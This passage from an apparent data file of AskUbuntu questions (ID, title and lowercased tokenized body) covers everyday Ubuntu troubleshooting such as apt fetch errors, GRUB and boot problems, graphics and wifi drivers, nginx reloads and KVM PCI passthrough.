mismatch failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/libp/libplrpc-perl/libplrpc-perl_0.2020-2_all.deb size mismatch failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/libd/libdbi-perl/libdbi-perl_1.622-1_i386.deb size mismatch failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/libd/libdbd-mysql-perl/libdbd-mysql-perl_4.021-1_i386.deb size mismatch failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/mysql-client-core-5.5_5.5.34-0ubuntu0.13.04.1_i386.deb size mismatch failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/libt/libterm-readkey-perl/libterm-readkey-perl_2.30-4build4_i386.deb size mismatch failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/mysql-client-5.5_5.5.34-0ubuntu0.13.04.1_i386.deb size mismatch failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/mysql-server-core-5.5_5.5.34-0ubuntu0.13.04.1_i386.deb size mismatch failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/mysql-server-5.5_5.5.34-0ubuntu0.13.04.1_i386.deb size mismatch failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/libh/libhtml-template-perl/libhtml-template-perl_2.91-1_all.deb size mismatch failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/mysql-client_5.5.34-0ubuntu0.13.04.1_all.deb size mismatch failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/m/mysql-5.5/mysql-server_5.5.34-0ubuntu0.13.04.1_all.deb size mismatch e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? how can i solve this ?
443742	how to back up files without live disk ?	i recently upgraded to 13.10 . the installation seemed to run fine , after the system rebooted i got the error `` the system is running in low-graphics modeâ after a few hours of googling no solution i found fixed this problem . i tried to downgrade using a disk and got the same error after installation . i then tried to back up my files using the disk by selecting `` try ubuntu '' . i really need to recover my data , i have weeks worth of work on there and some bitcoin i can not afford to lose . any help would be greatly appreciated .
443744	cpu problem with 13.10 vmware player appliance	i have mounted a 64-bit ubuntu .iso onto a vmware player virtual machine , but it came up with a messsage saying my host is unable to run 64-bit guest os-es . i have checked this issue with the vmware 64-bit test and it confirmed that message . afterwards , i downloaded a 32-bit .iso and did the same ( mounted it onto a virtual disk , that is ) and it came up with this message : error : this kernel requires an x86-64 cpu , but only detected an i686 cpu ... is there a way to fix this , and how ? i am using a 64-bit windows 8 laptop with 8 gigabytes of ram . thanks , matthew smith
443745	windows partition after installing ubuntu 13.10	i installed ubuntu on a computer with windows 7 . during installation , i chose the option to remove windows 7 . i had three partitions on my hdd : c , d and e. i thought ubuntu would install the os to the c : / drive . however , after installation , when i run ubuntu i ca n't access partitions d and e anymore . i would like to know if my old partitions are gone or deleted by ubuntu . thanks in advance .
443746	pam authentication failure	i got a dedicated server from a reputable hosting company . unfortunately , they 're one of those companies that thinks enabling root access is a good idea . i 've successfully disabled root access and password authentication for ssh logins -- i 've done that countless times . what i ca n't figure out is why i ca n't log in as a non-root user in a normal tty via ikvm . i can log in as root just fine , but no matter how many times i run variations on passwd , i ca n't log in as bob . here 's what i see in auth.log : apr 5 13:07:46 ubuntu login [ 2053 ] : pam_unix ( login : auth ) : authentication failure ; logname=login uid=0 euid=0 tty=/dev/tty1 ruser= rhost= user=bob apr 5 13:07:50 ubuntu login [ 2053 ] : failed login ( 1 ) on '/dev/tty1 ' for 'bob ' , authentication failure not very helpful .
443749	would executing fsck and resize2fs be possible in cygwin ?	i want to increase my wubi ubuntu installation size and i found a blog here which has some directions for doing so . i do n't have a ubuntu bootable disc . can anyone tell if the same things can be done by using cygwin in windows ? thanks a ton !
443753	managing a corrupted apt-get state	i 'm extremely frustrated with apt-get ( and probably dpkg also ) . at least once or twice per year my apt-get will mess things up on my server which requires a total reinstall of my debian os . this time , i wanted to install mysql server : apt-get install mysql-server it basically installed half of it to eventually that i ran out of hdd space ( oops , my fault ! ) . so i essentially clean things up ( to make space ) with apt-get by doing this : apt-get -- purge remove [ some-package ] for one , its frustrating that -- purge is misleading cause a bunch of files will stay behind , such as in /etc/init.d/ [ init-script ] where a few packages that i removed , the init scripts are still there ? so now that i have about 300 mb of free space in my root , i try to fix mysql by installing it ... nope , apt-get reports errors ! try removing it ... nope , apt-get reports errors . i 've tried with dpkg and force options . it does seem to work cause apt-get will report that the package is not installed . but if i type 'mysql ' i still have all the binaries lying around . so is the /etc/init.d/mysql script . and if i try to force install mysql , with : apt-get -f install mysql-server then apt-get does n't report any errors but nothing seems to be installed either . if i try to use the init-script to start it , it just times-out with a failure . trying to use the mysql simply states that it ca n't connect to the server ? ok i understand that the install has been messed up ! but why is it that apt-get always becomes so clueless and ca n't ever recover ? i 've always preferred debian because of it 's simple .deb files , but i 'm getting extremely frustrated with having to reinstall year after year which defeats the purpose of using debian and deb files .
443754	run multiple scripts using one script on boot ?	i need help . i 've tried several methods to get this to work . basically , i home host a server on my pc , the problem is , i want it to be online when logged in as every user on the computer . it uses multiple terminal instances . the server uses java . here are things i 've tried . 1.create a startup script , run the servers directly , and mount devices from there . result : the devices mounted , but only one server ran , terminal had the same result . conclusion : the script ran because the devices mounted , but only run one server and waited for the script to finish , but the script is set to loop so the main script did n't do anything . ( note : 2 & 3 were also using the startup script , however ... it was modified . ) 2.run server script in the background . command : ./server/here & exit result : the devices mounted , so the startup still worked , but only one server ran , however , when i ran another server in terminal , terminal closed , but the server ran as well . 3.have the main script boot up a program to run the servers on startup . result : devices mounted , however server 's did n't boot . 4.have the pc login as me and boot the servers ( untested ) expected result : logging in as another user would make the server shut down , however , what 's even better is that if someone were to come across the computer , they could easily hijack the server . ( note : i 've logged in as another user before , that made the servers shut down until i logged in again as me . ) so , with all that being said , is there any way i can do this ?
443755	predefined user groups	there are a lot of predefined groups on ubuntu ( and many other distros ) , but i ca n't seem to find any information about what each is for . some seem obvious or are well-known : cdrom is for access to optical media devices , and sudo is for access to the sudo command . however , many are ambiguous or not particularly obvious , like adm , sys , and tty -- each of those could have many purposes . is there complete documentation on this somewhere ?
443757	trouble to install ubuntu on a free os computer	i recently bought a computer with free os , with nothing on it except the uefi of the motherboard . its motherboard is an asus h81m-plus . i have only access to the uefi mode . i can set up a usblive ubuntu to install it but after the grub panel , whatever if i `` try ubuntu without installing '' or `` intall ubuntu '' , the installation program get stuck on the ubuntu logo . when i press ctrl+alt+f1 , i see the computer lock up in something like an infinite loop . i tried severall ubuntu like 13.10 , linux secure , but it is always the same . if someone has an idea to help me , it will be great . thank you .
443761	how is trim enabled ?	i have heard , that ubuntu 14.04 will have trim enabled by default . how will this be done ? by adding a discards option to the ext4 mount options or by running a cron-job ? will the default options for trim be automatically compatible with the lvm and encryption layers of the standard ubuntu-system encryption ? it would be great to see some details about this .
443762	how do i uninstall a program and dependencies from a tar.bz2 ?	i installed a program using make and sudo make install . is there a command i can use to remove these files now ?
443764	how do i install openmw ?	openmw seems like a great game , and it reboots a classic , but what is it exactly , and how do i install it ?
443765	grub changed brightness but after pressing brightness button return dark	my laptop is lenovo k49 . it 's dark so every time i need to change brightness manually . later i found a solution by changing the brightness as below : sudo gedit `` /etc/default/grub '' and change the line into grub_cmdline_linux_default= '' quiet splash acpi_backlight=vendor intel_backlight=vendor however when i press the brightness button on the keyboard it returns dark even adjusting to the maximum . this problem has haunted me for a really long time . any help would be appreciated . thanks !
443767	removed account fail	new user , was having problems with account . created new account . deleted old . not unable to change anything , because it asks for password and no password i have entered works . got to an error that said user is not in the sudoers file . this incident will be reported . attempted to add to username to admin . admin group does not exist . i 'm not sure what to do from here . running ubuntu 13.10
443771	trouble with mx record and mailbox	i have a machine running on internet with valid ip address 216.x.x.x . i have installed postfix on it . i have also purchased a domain , let 's say example.com for it from godaddy . i have a problem in regard to my mx record , which causes some confusion for me . in the godaddy , i have the a record as : @ 216.x.x.x and the mx record as : @ example.com i see people saying you need to add 'mail ' as an a record and mx record . like this a record : mail mail.example.com mx record : mail mail.example.com but i am running the postfix on port 25 on example.com and i do not have any mail.example.com . so the question is if my current setting correct or not , if not why is not right and why i need to add the mail.example.com to my mx record and why @ 216.x.x.x does not work . thanks
443772	do , while in bash	i want to get rx and tx from each network adapter , so to get rx and tx from one network adapter , i used this commands : cat /proc/net/dev | grep 'wlan0 ' |awk ' { if ( $ 2 ) print $ 2 } ' | awk -v var= '' $ ( date + '' % y- % m- % d % r '' ) '' ' { print $ 1 '' & '' , var '' ; '' } ' > > /opt/baran/log/baran_rx_usage_ $ ( date + '' % y- % m- % d '' ) ; cat /proc/net/dev | grep 'wlan0 ' |awk ' { if ( $ 10 ) print $ 10 } ' | awk -v var= '' $ ( date + '' % y- % m- % d % r '' ) '' ' { print $ 1 '' & '' , var '' ; '' } ' > > /opt/baran/log/baran_tx_usage_ $ ( date + '' % y- % m- % d '' ) ; as you see , i put result into a file with date ( daily ) . i want this in a while loop to get every netword adapter instead of just wlan0 , so we must have some log files like : opt/baran/log/baran_tx_usage_wlan0_2014-01-01 opt/baran/log/baran_rx_usage_wlan0_2014-01-01 opt/baran/log/baran_tx_usage_eth0_2014-01-01 opt/baran/log/baran_rx_usage_eth0_2014-01-01 opt/baran/log/baran_tx_usage_eth1_2014-01-01 opt/baran/log/baran_rx_usage_eth1_2014-01-01 opt/baran/log/baran_tx_usage_eth2_2014-01-01 opt/baran/log/baran_rx_usage_eth2_2014-01-01 opt/baran/log/baran_tx_usage_eth3_2014-01-01 opt/baran/log/baran_rx_usage_eth3_2014-01-01 as you can see , i have one wireless adapter and 4 eth , and i want log file for each of them daily . thanks
443775	nginx failing to reload - how to track down why ?	hi i 've had my nginx server running great on ubuntu server 12.04 for a while . i 've been gradually bolting on various bits , and got as far as optimising load times on my wordpress page . after making a few changes to my hosts file i decided to : sudo /etc/init.d/nginx reload to which i get : reloading nginx configuration nginx [ fail ] no additional info or reasoning is given . how can i restart my server so that it prints any error statements whilst reloading so i can begin to track down the error . for a bonus question : for those nginx sysadmins , when you 've made a bunch of changes to hosts and bolted on a few other bits and suddenly your nginx server wo n't reload ( incidentally everything still appears to be running ! ) how do you begin your approach to isolating why or begin breaking things down to debug !
443776	problem with boot loader installation	i had ubunto 10.04 working on a eeepc and i decided to make a fresh installation . i used an usb stick with 12.04 . at the end the installer said it was impossible to install the boot loader in /dev/sda ( i have a single partition disk ) i tryed manually , by doing : mount /dev/sda1 /mnt grub-install -- root-directory=/mnt/ /dev/sda i got the message error : can not write to /dev/sda how can i install the boot loader ? remark : for allowing the usb live-cd start i had to enter in the bios and set the stick as a primary disk and the drive of the eeepc as a secondary . i do n't know if this affects the procedure . once the live-cd starts , the usb is named /dev/sdb1 and mounted in /cdrom . thanks
443777	what nvidia driver do i use for a geforce 880m gts ?	i have an imac 9,1 the graphic card is : geforce gt 130 based on what i found here . what nvidia driver do i use in ubuntu to support this card ? i am using ubuntu 12.04
443782	losing display after boot up	newbie trying to use ubuntu on dell computer with vga display and tv as second monitor . in gui i set an option that turned off both my screens . now , when the system boots , the screens go blank . i can boot by typing ctrl+alt+f1 and get the system prompt . how can i reset to get the default setting/display back ?
443788	what is a partial upgrade and when is it necessary ?	sometimes when i am running a development version of ubuntu , the software updater will tell me that a partial upgrade is needed when i check for updates . what is a partial upgrade , and why are they necessary ? sometimes users run into problems when doing them , so when should i run a partial upgrade , if ever ?
443789	what does 'chmod +x < filename > ' and how do i use it ?	i want to write a 'batch file ' , but i do n't know how to use chmod +x < filename > command , nor where to use it .
443790	ca n't set transmission to download files	just installed ubuntu 12. on my new computer . when trying to download files i want to use transmission but after i choose a file to download transmission is not in the list of programs to run with ( infact it 's empty ) and when i click `` choose a program '' ( or whatever it says in english '' ) and find the folder transmission there 's no file or program to choose from ( i also choose `` show hidden files '' , the folders within the transmission folder are empty exept for settings.json . when i go to the list of settings in firefox , transmission are not among these and i do n't know how to add it . please , help . want to getting started downloadning again .
443792	installation of ubuntu from usb-flash-drive	i 'm attempting to install ubuntu onto a 'non-pae computer ' . all goes well until i reach the download installer components . after that step the screen clears with a violet-blank screen with one white line on the bottom forever . the network light blinks occasionally . keyboard strokes are displayed on the white line . no response . yes the processor is of an older type , but it does work . i can boot a much older version of ubuntu that is somewhat limited . i would like to be able to install new programs from the web . used as an embedded system for alarms and controls . any help would be appreciated . -- thank you
443795	how to set sound=alsa in already created wine volume	i just got starcraft 2 working on ubuntu finally but lost audio when i installed a new version of wine . if i do 'winetricks -- gui ' i can change the sound setting of the default wineprefix and this works to get sound back but this does n't seem to affect my already created volume in playonlinux and when i go back into the gui the change is not reflected . anyone know how to change this permanently across wine ? thanks .
443797	getting a ksplice error after installing from ubuntu software center	there 's a red circular icon with a white horizontal dash in my taskbar which says : an error ocurred , please run package manager from the right-click menu or apt-get in a terminal to see what is wrong . the error message was : unknown error : 'class 'systemerror ' > e : the package ksplice-uptrack needs to be reinstalled , but i ca n't find an archive for it. ) ' . this usually means that your installed packages have unmet dependencies . i tried sudo apt-get remove uptrack and sudo apt-get -- purge remove uptrack . after reading state information it just says : e : the package ksplice-uptrack needs to be reinstalled , but i ca n't find an archive for it . ca n't access ubuntu software center , software updater ; and firefox is spontaneously closing .
443801	how do i change the boot sequence on my computer ?	i have windows vista and ubuntu 13.1 on my computer . it keeps trying to default boot to windows . how do i change this ?
443802	changing screen length and height	i have a samsung notebook which has a 1600x900 resolution screen , however when i connect it to a 1920x1080 tv and select show only tv screen is not being fitting properly and i can not see the status bar and program bar at the left properly . setting that was possible with an intel software but i could n't find any program to do that . i have tried to set it from system settings but no chance , can you help ? tried changing resolutions and drivers and nothing change i ca n't see status bar at all and i can see only half of unity at the left ! !
443803	evolution 3.8.4 hotmail calendar	how can i configure evolution 3.8.4 , on ubuntu 13.1 , to sync with my hotmail calendar and contacts ? i already have evolution to sync my e-mails via imap to my hotmail account .
443805	remote connection	i have many pcs on my job running vnc for remote access , and i use ubuntu 13.10 , which way is best for this connection pcs ? is there any program that could use
443806	can i download ubuntu for free or do i have to pay 20 dollars ?	can i download ubuntu for free or do i have to pay 20 dollars ? the option `` not now , take me to the download '' does not take me to the download page .
443808	monitor ( screen ) settings	both defaults for screen settings ( 1024x768 ; 800x600 ) do n't match properly . circles are not shown as circles , but ellipse . where can i get more options ?
443809	wireless connection can not activate proprietary driver	running ubuntu 13.10 on a older hp pavilion ze2200.tried to download driver , says using a porprietary driver and can not activate .running windows xp on same computer and wireless works fine . is there a workaround to this problem driver ? thanks
443811	skype not opening on kubuntu 12.04	every time i go to launch skype it 'll make it look like it 's loading but then no windows pop up . i think i 've installed right because when i search for it the icon will come up . is there a way to fix this ?
443817	dash searching does n't work ( ubuntu 13.10 )	i 've freshly installed ubuntu 13.10 and after reboot ( settings of launcher did n't apply , but now they work ) my dash does n't work . it used to search without any troubles , but now it gives only `` sorry , there is nothing that matches your search '' whatever i 'm looking for . i 've already tried several solutions including reinstall of unity , restart of unity and tons of commends i do n't really get ( well ... i 'm like super-newbie here ) . any advice ?
443818	problems with nvidia gt630m drivers	hello i have used ubuntu 12.04 for some time now but now i have encountered a really annoying problem that drives me crazy . i first got this problem when i updated my nvidia drivers , version 331 recomended . i also tried the none recomended version . the problem is that the xserver freezes , the computer itself is fine and the only problem is that `` unity '' freezes . the problem can be solved by simply do [ ctrl+alt+ ( f1-f6 ) ] and the [ ctrl+alt+f7 ] in order to restart the xserver . ubuntu works fine with `` unity2d '' but the taskbar ( the bar to the left ) takes up way to much space . i posted this question some time ago but i gave up . i have reinstalled ubuntu but the problem remains . why does this happen ? how can i fix this problem ? is it indeed the drivers that is the cause of this problem ? or is it possible that it might be a graphic card failiure ? or any other reasons for this to happen ? how likely is it that the problem remains on ubuntu 14.04 lts ( since i am planning on an upgrade ) os : ubuntu 12.04 lts computer spec : asus k53sm intel core i5 ( 2.5ghz ) nvidia gt 630m ( 2gb ) 4gb ram
443822	wireless connection button on acer aspire 2930z wo n't work !	i 've just installed ubuntu 12.04 on my acer aspire 2930z , along side my windows 7 ( dual boot ) . problem is - i ca n't get a wifi connection - the wifi button is off and does n't respond . connection is good with ethernet cable and with the wifi on windows . i guess some driver is needed , but i have no idea though . i 've tried sudo apt-get update , as well as apt-get upgrade and bcmwl-kernel-source , all kinds of stuff i found on the internet as a possible solution . if anyone knows the `` correct answer '' to my problem , it would be really helpful . -- thanks !
443823	how to edit displayed bash name	i 've done some googling , and looking around this stack overflow , but this one seems to elude me . how might i reduce/edit the displayed bash name on the terminal prompt ? i.e . this : fresearch @ fresearch-mm061 : ~/desktop/blog $ to : | > $ i ( sort of ) know who i am , and ( sometimes ) know where i am . i have a small laptop screen , and would rather have the screen space . i have read through some of the bash man pages , but i decided not to start mucking about with vital settings files , and no idea what i was doing . thoughts ? thanks !
443829	installing new character encodings	when i open some text files that should contain šđčćž characters ( serbian latin ) , ie from subtitle sites , i get wrong characters è , æ ... also , when i try to save file in encoding other than utf-8 i get this error : failed to encode file `` aaa.bbb.sub '' with codec `` windows-1250 '' , ( for example ) this problem is system wide , not specific to gedit , happens on various text and subtitle editors . i 've tryed to add more encodings and no result . so , how to resolve this ? thanks ...
443830	delete all files that contain a particular string ?	i changed my wordpress theme . the older one created so much images on server . my new theme doesnt need them , so i want to remove all . how can i do that ? for example : default image : 12_angry_men_lone_holdout.jpg i want to delete : 12_angry_men_lone_holdout-290x166.jpg 12_angry_men_lone_holdout-700x300.jpg 12_angry_men_lone_holdout-50x50.jpg using digitalocean , ubuntu 13.10 .
443831	usb-creator : error erasing device : unknown or unsupported erase type	i created a live usb using usb-creator-gtk . i installed ubuntu with it and all was good with the world . now i am trying to use the same memory stick and create a live usb for 14.04 and i get the following error when trying to erase the disk . org.freedesktop.dbus.python.gi._glib.gerror : traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/dbus/service.py '' , line 707 , in _message_cb retval = candidate_method ( self , *args , **keywords ) file `` /usr/share/usb-creator/usb-creator-helper '' , line 239 , in format block.call_format_sync ( 'dos ' , glib.variant ( 'a { sv } ' , { 'erase ' : glib.variant ( 's ' , '' ) } ) , none ) gi._glib.gerror : gdbus.error : org.freedesktop.udisks2.error.failed : error erasing device : unknown or unsupported erase type `' how can i fix this so i can create a new live usb ?
443834	a newbie question on maas	thank you for reading this : recently i was given a project at my university to install linux on 3 computers . we created a bootable disc and got to work , following the step-by-step instructions in : http : //maas.ubuntu.com/docs/install.html . the first computer was a success and we installed our maas and completed the process . the problem came when the process was initiated on the other computers , which we were going to use as clients with the same maas . the window popped up asking us to `` specify maas by name or address '' or `` create a new maas on this server '' to which we chose the first option . upon typing in our maas code ( the http : // [ ip address ] /maas ) the machine shut itself down . i do not know where i went wrong . i have a few days left and can complete by monday and would prefer not to ask my instructor to assist me in the lab . since i 've already created a maas on one computer should i have chosen the `` install ubuntu server '' at the beginning of the process ? or should i choose the `` create a new maas on this server option ? '' any advice you can give me is appreciated ! i am very new to this .
443835	view network traffic	i 've found a few programs that report network traffic , to which ips communications are with and a few more details . is there any way to see details of these packets ? specifically i want to view the contents of packets from and to skype .
443836	burn ubuntu 13.10 to a dvd	i 've downloaded the ubuntu.rar file and extracted it . upon extracting i ended up with a large amount of different files and not a .iso file . should i burn all the files to a dvd ? will that work ? sincerely
443840	system is running in low-graphics mode : 13.10	been trying all the different answers out there about this issue and still have nothing working . i ran the updates today , april 5th , and upon rebooting i started getting this error . i 'm running on an asus ultrabook ( intel graphics ) so none of the nvidia/ati `` solutions '' really help . someone mentioned downloading the repos for the unstable intel drivers but that does n't work either . nothing seems to help recover the system . is there anything special to be done for intel graphics computers that will help here ? other things i tried : reinstalling lightdm removing all nvidia files and reinstalling them
443842	installing tp-link tl-wdn4800 adapter with ath9k	i just bought a wireless adapter and am still trying to install its drivers onto ubuntu . i have looked up ath9k and seen that it is compatible with kernal module ath9k . i 'm new to ubuntu and most of the code is still over my head , and most of the guides that i have read involve connecting to the router which i am unable to do . i am need of figuring out how to install ath9k without any network connection . appreciate any and all help . lspci -nn | grep 0208 01:00.0 network controller [ 0280 ] : qualcomm atheros ar93xx wireless netwrok adapter [ 168c:0030 ] ( rev 01 ) uname -r 3.11.0-15-generic
443843	how to use guake at right side monitor in dual display environment	i want to use guake at right monitor . so i added this ppa by sudo add-apt-repository ppa : cberner/guake , and sudo apt-get update . https : //launchpad.net/~cberner/+archive/guake/+index ? field.series_filter=raring instruction says that i can set monitor_index somehow . but i could n't find how to configure . does someone know about this ?
443849	can not rearrange launcher icons	i am no longer able to rearrange launcher icons . i can drag the icon to a desired new position , but it will not drop . also , clicking on `` unlock from launcher '' has no effect . it is not a mouse problem as i have no other mouse issues and i 've tried this with a mouse and with a touchpad . thanks for the help ! 13.10 64-bit
443850	install xfce unable to fetch 503 service unavailable	i 'm trying to install ubuntu with crouton and sh -e ~/downloads/crouton -t xfce on my samsung chromebook , i 've done it already two times before and it worked well but i had some problems so i reinstalled chrome os from the usb stick and everything but i 've got that at this step : get 15 : http : //ports.ubuntu.com/precise/main pkg-config armhf 0.26-1ubuntu1 failed to fetch http //ports.ubuntu.com/ubuntu-ports/pool/main/g/gcc-defaults/cpp_4.6.3-1ubuntu5_armhf.deb 503 service unavailable e : unable to fetch some archives maybe run apt-get update or try with -- fix-missing ? failed to complete chroot setup . unmounting /usr/local/chroots/precise ... and i tried sudo apt-get update but apt-get was not found .
443857	how to download other different deb files with apt-get in ubuntu ?	is there any way how to download another version of deb files with apt-get in ubuntu 12.04 ? in ubuntu 12.04 , the default version is precise , and when we use the sudo apt-get install ** command to install packages , the apt-get can find the suitable packages automatically . but is there any way to download the deb packages with specific version , such as ubuntu 10.04 ( lucid ) ? in my circumstance , i have an raspberry pi , its main version is debian and its symbol version is wheezy . when i use the sudo apt-get install ** , the network speed is very slow . so i want to add the apt source address of wheezy into my ubuntu 12.04 's apt source addresses . and use the ubuntu 12.04 to download the wheezy 's packages , then copy them into the raspberry pi and install . thanks in advance !
443859	printer installation	i had an epson workforce 3450 printer installed under 12.04 , when i upgraded to 13.10 , it did not show up and i can not get it to install . this is a wireless network printer , which the program finds , but hangs up when i try to load drivers . any ideas ?
443860	kvm problem using iommu	i 've been trying to assign a video card to a kvm guest operating system using pci passthrough . there 's been stumbling blocks , but this one has me stumped . here is the lspci output for the device being passed -- root @ atlantis # lspci | grep amd 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] tahiti xt [ radeon hd 7970/r9 280x ] 01:00.1 audio device : advanced micro devices , inc. [ amd/ati ] tahiti xt hdmi audio [ radeon hd 7970 series ] i am not using this device for my host at all . the host uses integrated intel graphics . i followed this guide for unbinding the pci device from the host and creating a pci-stub . the error i receive when creating the guest is -- unable to complete install : 'unable to read from monitor : connection reset by peer' i have verified vt-d is enabled in my bios and see intel-iommu : enabled in the dmesg logs . root @ atlantis # dmesg | grep -e dmar -e iommu [ 0.000000 ] acpi : dmar 00000000aa3b1b08 00090 ( v01 intel hsw 00000001 intl 00000001 ) [ 0.000000 ] intel-iommu : enabled however , i do see this in the /var/log/libvirt/qemu/guest.log -- qemu-system-x86_64 : -device pci-assign , configfd=26 , host=01:00.0 , id=hostdev0 , bus=pci.0 , addr=0x6 : no iommu found . unable to assign device `` hostdev0 '' qemu-system-x86_64 : -device pci-assign , configfd=26 , host=01:00.0 , id=hostdev0 , bus=pci.0 , addr=0x6 : device initialization failed . qemu-system-x86_64 : -device pci-assign , configfd=26 , host=01:00.0 , id=hostdev0 , bus=pci.0 , addr=0x6 : device 'kvm-pci-assign ' could not be initialized i really do n't understand how that can be . dmesg log says it 's enabled . libvirt log says no iommu found . is there possibly a configuration elsewhere i 'm missing ? any help is greatly appreciated !
443861	uninstalled ubuntu one but still seeing `com.ubuntu.one.fsevents`	there is a previous post on how to uninstall ubuntu one from a mac and i have done all of what is required . however , i still get the program com.ubuntu.one.fsevents running on startup of my mac running mavericks . i have to run the terminal program to stop it every time i start up my computer now . here is the link to the uninstall process ; how to completely uninstall u1 client from os x please help . this daemon program wo n't stop unless i force it to stop in terminal every time i boot up my mac . and now you all are discontinuing ubuntuone so i want to make sure this is resolved quickly .
443863	how can i check what ports an app is using so i can enable them in ufw ?	with the soon to be demise of ubuntu one i started looking at other ways to store backup in the cloud . i already had the dropbox client installed and have been storing back ups there for now . not wanting to use all of my space there this got me to looking at ways to manage my other personal clouds with google , onedrive and box . after some research i came across a solution here using this software . it is n't as good of a solution as a native client , but it does work . the problem i am running into is with ufw enabled the client can not connect . i have looked through smes ' paltry faq and scoured the internet until my eyes bleed to no avail . is there any way to find out what ports need to be opened in ufw for this to work without shutting ufw off ?
443866	bluetooth not working openobex error	my bluetooth is not working . wy system can detect the bluetooth devices , but unable to send or receive any files . it 's showing an error in the `` file transfer '' window as : [ gdbus.error : org.openobex.error.failed : unable to request session ] with retry and cancel option . i recently installed ubuntu 13.10 on a machine having configuration i5 , 500gb hdd , 4gb ram , 1 gb graphics .
443868	long term package mirrors	i am having a bit of a tricky packaging problem with my trusty ubuntu cloud machines . i understand that trusty is currently in `` beta '' , so i can appreciate that i sort of have to just deal with it . but there is a wider problem , and i 'm looking for a general solution to it . basically , an important package ( unbound ) for my infrastructure got broken by an upgrade . since the ubuntu archives automatically delete old versions of packages ( which effectively makes it a rolling release distro , a point for another day ... ) , i am not able to use the basic apt tool to downgrade to the last version . in particular , what i 'd like to do is say : sudo apt-get install unbound=1.4.21-1ubuntu2 and have apt-get install that version . but since it is not in the repositories , the command wo n't work : $ sudo apt-get install unbound=1.4.21-1ubuntu2 reading package lists ... done building dependency tree reading state information ... done e : version '1.4.21-1ubuntu2 ' for 'unbound ' was not found i understand i can use dpkg -i to install the package . but that solution does not work for me -- i 'd have to change my hammer to deal with a defective nail . so , is there any `` long-term '' repository mirror i can use ? a mirror that methodically keeps at least a few older versions of each package ?
443869	updates caused computer to lose desktop	i ran updates tonight on my 12.04.4 lts system . after it rebooted the desktop is no longer there . upon startup i get message `` no drive '' , and it asks for login and password . how do i recover ? i have operating system booting from an ssd . should i unplug the other 2 hard drives ?
443871	need an audio player that loops between two points ( not vlc )	vlc has this function , but it 's only working for one file ( i have no idea why ) . is there another player for linux that will do this ?
443872	installation-problem	i ca n't get ubuntu to work . normally whenever i download something i click open and run , but after downloaded ubuntu , when i click open , i get an error message that no program associated , go to control panel to create an association ( best i can remember what the error message read ) . okay , i went to the control panel , then what . i do n't see anything about creating an association . i tried downloading it twice . now will this cause a problem . i 'm an older guy . please help . i 'm even having trouble sending my question . i keep getting flagged for a tag .
443873	how to display screen by screen in terminal	i am searching some files in terminal but the files is too long , how can i view them screen by screen .
443875	different behavior of 2 encrypted lvms	recently i created ext4 on top of luks on top of lvm . about 20gb . i also have similar configuration ( 900gb ) created long time ago - i do n't remember how exactly i created it . both are not mounted on startup . when i mount them by clicking in nautilus ' 'my computer ' or in drivemount_applet2 or in palimpset i see a bit different . both partitions are decrypted correctly and mounted under /media/file_size_label but : - the more recent one 's icon gets a yellow padlock od gives me a method to unmount . - the old partition 's icon stays as it was but new icon appears . icon of the mounted filessytem and the problem is : the new one gives me the option to unmount but the old one does not ( as it 's not mounted , just new drive appeared ) therefore i ca n't close luks during unmounting . how can i fix that ? are there any both partitions can be closed manually with cryptsetup luksclose , both looks similar when i do cryptsetup status . filesystem inside luks has no errors . ubuntu 12.04 lts picture from nautilus 'my computer ' : picture from drivemount_applet2 : pictures from palimpset :
443878	working significantly so slow	my system is taking some time ( around 10 minutes or more ) to start . while checking system , there is no function which eating up my resources , but still its slow to start and also takes a while to start any applications particularly browsers . recently installed ubuntu 13.10 on a machine having configuration i5/500 hdd/4gb ram/i gb grphics , using default installed driver inspiron m5010 / xps 8300. please suggest me to make my system a bit faster .
443886	installing d-link dwa-131 ( 13.10 )	i found this thread : how do i install a d-link dwa-131 ? but it has been closed . one comment referred to this guide : http : //bernaerts.dyndns.org/linux/74-ubuntu/277-ubuntu-precise-dwa-131-rev-b1 but it does n't work . to begin , the guide is for this : package barcode showing h/w ver . : b1 f/w ver . :2.00 but my package has package barcode showing h/w ver . : b1 f/w ver . :2.01 as for the vendor id of 2001 and device id 330d i ca n't see either of those numbers on the box or in the example shown in the guide . next , the guide talks about updating the kernel but the kernel i am running is already higher : my kernel linux connor 3.11.0-19-generic # 33-ubuntu smp tue mar 11 18:48:34 utc 2014 x86_64 x86_64 x86_64 gnu/linux my version connor @ connor : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : saucy when i do the next step sudo modprobe rtl8192cu swenc=1 there 's no output then the next echo `` 2001 330d '' | sudo tee /sys/bus/usb/drivers/rtl8192cu/new_id this is the output 2001 330d my lsusb bus 003 device 006 : id 2001:330d d-link corp . i 've also been trying this thread http : //ubuntuforums.org/showthread.php ? t=2200493 & page=2 & p=12978483 # post12978483 i did the driver update instruction , it seemed to update but when i reboot still no light coming on the usb device next i try this command lsmod iwconfig ifconfig -a cat /etc/resolv.conf this is the output module size used by rfcomm 69130 0 crct10dif_pclmul 14289 0 crc32_pclmul 13113 0 lrw 13286 1 aesni_intel gf128mul 14951 1 lrw ath9k 155907 0 ath9k_common 13859 1 ath9k ath9k_hw 444732 2 ath9k_common , ath9k ath 23827 3 ath9k_common , ath9k , ath9k_hw mac80211 597268 1 ath9k cfg80211 480503 3 ath , ath9k , mac80211 connor @ connor : ~ $ iwconfig wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=16 dbm retry long limit:7 rts thr : off fragment thr : off power management : off connor @ connor : ~ $ ifconfig -a wlan0 link encap : ethernet hwaddr 24 : fd:52:79:9c:53 broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 